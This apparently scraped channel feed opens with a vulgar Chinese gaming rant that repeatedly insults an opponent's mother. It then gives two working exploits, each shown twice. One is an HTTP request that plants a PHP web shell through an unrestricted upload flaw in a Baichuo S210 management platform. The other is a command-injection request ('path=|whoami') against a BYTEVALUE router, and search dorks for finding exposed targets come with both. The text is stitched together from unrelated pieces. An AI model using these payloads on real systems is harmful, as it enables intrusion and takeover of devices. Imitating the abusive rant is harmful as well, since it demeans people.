啊下一位是个什么……🤔?还……又是又是这个法师。这这这这这炸不动啊,你看他法师,啧,还披着个重甲,刚刚是不是就是他利用这个重甲来和我拼刀啊😡。😃唉拼死你的妈😃,把你妈拼火葬场里面去😁。啊,我当时操你妈的时候,身上,一套大山羊,133韧😋。你和你爹都没拦住我,你爹拿个匕首,打一下30削韧,你拿个刺剑,一下40削韧,加起来70削韧你们一人打我一下,我还是冲到房间里把你妈草了👉🏻🤡。这就是大山羊的魅力,协助我去操死你的妈🤣。喝~,怎么就跑了啊?你说你这个,你玩法师是怎么玩的啊我就感到匪夷所思啊😕,我百思不得其解啊😕,我们玩法师是怎么玩的,我们玩法师不是这么玩的……今天这个,这个法师绝活哥教你怎么玩法师🤓。首先你玩法师啊,你得准备两个啊这个长矛,一把是寒冷质变的,另一把也是寒冷质变的🥶🥶🥶……你看看这常韧,啧啧你看到没?刚刚内一刀🔪,就站在原地给我拼刀啊,拼死你的妈😤。(沉默)算了,我们不能骂人,我们是要有素质的🤡🤡🤡。我们刚刚说什么,常韧🤔 。他,他,他有这个这个重甲常韧啊防御力又高,你打他又不出硬直😓,然后啊……欸,啊,他卡起了来了😠。而且还有一个点啊,就是,(咂嘴声)这个游戏也是很需要立回的,但是你打不出别人的硬直,你立回就没有任何意义🤑🤑。唉他刚刚又这个魔力瞟了我一下,还在这装逼你看他抖刀👿😡😅(咂嘴声),搞不懂你在装什么逼😡👊🏻,你你你……你你,你你……你你你……你看我双矛轮椅是不是(唐突激动)唉操死你的妈😀。你身上穿的这个常韧比双矛更加轮椅啊🚘🚘🚘……🤜——→🤜——→,🤜——→🤜——→,🦵🌪️🦵🌪️🤜——→🤜——→(鞭尸,投喂💩块,抖刀嘲讽)
👍5
北京百绰智能S210管理平台uploadfile.php无限制上传漏洞
noscript="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1Host: 192.168.40.130:8443Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887Content-Length: 405Origin: https://192.168.40.130:8443Referer: https://192.168.40.130:8443/Tool/uploadfile.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close-----------------------------13979701222747646634037182887Content-Disposition: form-data; name="file_upload"; filename="contents.php"Content-Type: application/octet-stream<?phpsystem($_POST["passwd"]);?>-----------------------------13979701222747646634037182887Content-Disposition: form-data; name="txt_path"/home/src.php-----------------------------13979701222747646634037182887--
路径:/home/src.php
noscript="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1Host: 192.168.40.130:8443Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887Content-Length: 405Origin: https://192.168.40.130:8443Referer: https://192.168.40.130:8443/Tool/uploadfile.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close-----------------------------13979701222747646634037182887Content-Disposition: form-data; name="file_upload"; filename="contents.php"Content-Type: application/octet-stream<?phpsystem($_POST["passwd"]);?>-----------------------------13979701222747646634037182887Content-Disposition: form-data; name="txt_path"/home/src.php-----------------------------13979701222747646634037182887--
路径:/home/src.php
百为智能流控路由器RCE
noscript="BYTEVALUE 智能流控路由器"
GET /goform/webRead/open/?path=|whoami HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 127
noscript="BYTEVALUE 智能流控路由器"
GET /goform/webRead/open/?path=|whoami HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 127
Forwarded from Jack Black
